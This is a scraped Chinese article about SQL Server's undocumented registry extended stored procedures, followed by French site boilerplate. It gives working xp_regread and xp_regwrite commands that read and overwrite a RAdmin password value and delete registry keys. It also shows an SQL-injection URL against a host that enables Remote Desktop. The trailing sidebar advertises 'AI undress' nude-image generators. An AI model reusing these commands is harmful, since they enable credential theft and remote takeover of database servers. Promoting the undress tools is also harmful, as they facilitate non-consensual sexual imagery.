几个扩展存储过程使用方法
sqlserver里面有一些危险的扩展存储过程,可以操作注册表,所以很多情况下,下面的存储过程为了服务器安全都会将这些存储过程删除。不过防御与安全同等重要。下面是具体的注册的操作方法。
SQL Server中包含了几个可以访问系统的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统的能力,
而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
xp_regenumvalues 以多个记录集方式返回所有键值
使用方法:
xp_regenumvalues 根键, 子键
比如说,想看看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 的所有键值:
use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
xp_regread 返回制定键的值
使用方法:
xp_regread 根键,子键,键值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
得到密码
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'
远程桌面开启为0
xp_regwrite 写入
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY','';--
必须清空后再写新数值
修改成功的前提是值为空
注意值类型有2种REG_SZ 表示字符型,相当于新建字符串值,REG_DWORD 表示整型,相当于新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用远程桌面
xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
xp_regdeletekey 删除键,包括该键下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
运行前提SA
可能用处不是很大,也没深入研究,因为觉得读asp用xp_makecab更方便点,仅供思维扩展。
方法1.bulk insert aaa FROM 'c:\1.txt'
方法2.xp_readerrorlog 1,'c:\1.txt'
开启远程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;--
Outils d'IA chauds
Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes
AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.
Undress AI Tool
Images de déshabillage gratuites
Clothoff.io
Dissolvant de vêtements AI
AI Hentai Generator
Générez AI Hentai gratuitement.
Article chaud
Outils chauds
Bloc-notes++7.3.1
Éditeur de code facile à utiliser et gratuit
SublimeText3 version chinoise
Version chinoise, très simple à utiliser
Envoyer Studio 13.0.1
Puissant environnement de développement intégré PHP
Dreamweaver CS6
Outils de développement Web visuel
SublimeText3 version Mac
Logiciel d'édition de code au niveau de Dieu (SublimeText3)
Du début à la fin : Comment utiliser l'extension php cURL pour effectuer des requêtes HTTP
Jul 29, 2023 pm 05:07 PM
Du début à la fin : Comment utiliser l'extension php cURL pour les requêtes HTTP Introduction : En développement web, il est souvent nécessaire de communiquer avec des API tierces ou d'autres serveurs distants. Utiliser cURL pour effectuer des requêtes HTTP est un moyen courant et puissant. Cet article expliquera comment utiliser PHP pour étendre cURL afin d'effectuer des requêtes HTTP et fournira quelques exemples de code pratiques. 1. Préparation Tout d'abord, assurez-vous que l'extension cURL est installée sur php. Vous pouvez exécuter php-m|grepcurl sur la ligne de commande pour vérifier
Extensions et modules tiers pour les fonctions PHP
Apr 13, 2024 pm 02:12 PM
Pour étendre les fonctionnalités des fonctions PHP, vous pouvez utiliser des extensions et des modules tiers. Les extensions fournissent des fonctions et des classes supplémentaires qui peuvent être installées et activées via le gestionnaire de packages pecl. Les modules tiers fournissent des fonctionnalités spécifiques et peuvent être installés via le gestionnaire de packages Composer. Des exemples pratiques incluent l'utilisation d'extensions pour analyser des données JSON complexes et l'utilisation de modules pour valider les données.
Étapes et précautions pour la mise en œuvre des mises à jour par lots à l'aide de procédures stockées Oracle
Mar 08, 2024 pm 04:12 PM
Titre : Étapes et précautions d'implémentation des mises à jour par lots par les procédures stockées Oracle Dans la base de données Oracle, les procédures stockées sont un ensemble d'instructions SQL conçues pour améliorer les performances de la base de données, réutiliser le code et renforcer la sécurité. Les procédures stockées peuvent être utilisées pour mettre à jour les données par lots. Cet article explique comment utiliser les procédures stockées Oracle pour implémenter des mises à jour par lots et fournit des exemples de code spécifiques. Étape 1 : Créer une procédure stockée Tout d’abord, nous devons créer une procédure stockée pour implémenter les opérations de mise à jour par lots. Voici comment créer une procédure stockée
Comment supprimer une procédure stockée dans MySQL
Sep 05, 2023 am 10:25 AM
Les méthodes MySQL pour supprimer des procédures stockées incluent l'utilisation de l'instruction DROP PROCEDURE, l'utilisation de MySQL Workbench et l'utilisation d'outils de ligne de commande. Introduction détaillée : 1. Utilisez l'instruction DROP PROCEDURE Les étapes consistent d'abord à ouvrir le client MySQL ou à utiliser n'importe quel outil prenant en charge MySQL, puis à vous connecter à votre base de données MySQL et enfin à exécuter l'instruction SQL suivante pour supprimer la procédure stockée 2. Utilisez MySQL Workbench pour supprimer les procédures stockées, etc.
Comment installer l'extension mbstring sous CENTOS7 ?
Jan 06, 2024 pm 09:59 PM
1.UncaughtError:Calltoundefinedfunctionmb_strlen(); Lorsque l'erreur ci-dessus se produit, cela signifie que nous n'avons pas installé l'extension mbstring ; 2. Entrez dans le répertoire d'installation de PHP cd/temp001/php-7.1.0/ext/mbstring ; /usr/local/bin /phpize ou /usr/local/php7-abel001/bin/phpize) pour installer l'extension php 4../configure--with-php-config=/usr/local/php7-abel
Procédure stockée Oracle : méthode d'implémentation pour déterminer si une table existe
Mar 08, 2024 pm 09:18 PM
Les procédures stockées dans la base de données Oracle sont un type spécifique de procédures stockées utilisées pour exécuter une série d'instructions SQL et d'opérations sur les données dans la base de données. Dans le travail réel de développement de bases de données, nous devons parfois déterminer si une certaine table existe dans la base de données, afin de pouvoir effectuer un jugement et un traitement logique dans le processus stocké. Ci-dessous, nous présenterons comment implémenter la méthode permettant de déterminer si une table existe dans la base de données Oracle et fournirons des exemples de code spécifiques. Tout d'abord, nous pouvons utiliser la table système user_tables ou all_t
Principes de mise en œuvre et applications des procédures stockées Golang
Feb 22, 2024 pm 04:57 PM
Principes de mise en œuvre et applications des procédures stockées Golang Une procédure stockée est un programme précompilé qui est stocké dans une base de données relationnelle et peut être appelé par une application. Elle peut réduire efficacement le coût de la transmission réseau des données et améliorer l'efficacité d'exécution de la base de données. Bien que Golang ne prenne pas directement en charge les procédures stockées, vous pouvez simuler les fonctions des procédures stockées à l'aide d'instructions SQL. Cet article présentera les principes et les applications de la mise en œuvre de procédures stockées dans Golang et fournira des exemples de code spécifiques. 1. Le principe de mise en œuvre de la procédure stockée Golang est en Gol
Comment écrire des procédures stockées et des fonctions personnalisées dans MySQL en utilisant C#
Sep 22, 2023 am 09:42 AM
Comment écrire des procédures stockées et des fonctions personnalisées dans MySQL à l'aide de C# Introduction : MySQL est un système de gestion de base de données open source largement utilisé et C# est un langage de programmation orienté objet couramment utilisé. Au cours du processus de développement, nous devons souvent utiliser des procédures et des fonctions stockées dans une base de données pour améliorer la réutilisabilité et les performances du code. Cet article explique comment utiliser C# pour écrire des procédures stockées et des fonctions personnalisées dans une base de données MySQL et fournit des exemples de code spécifiques. 1. Procédures stockées Une procédure stockée est un ensemble d'instructions SQL qui effectuent des tâches spécifiques.
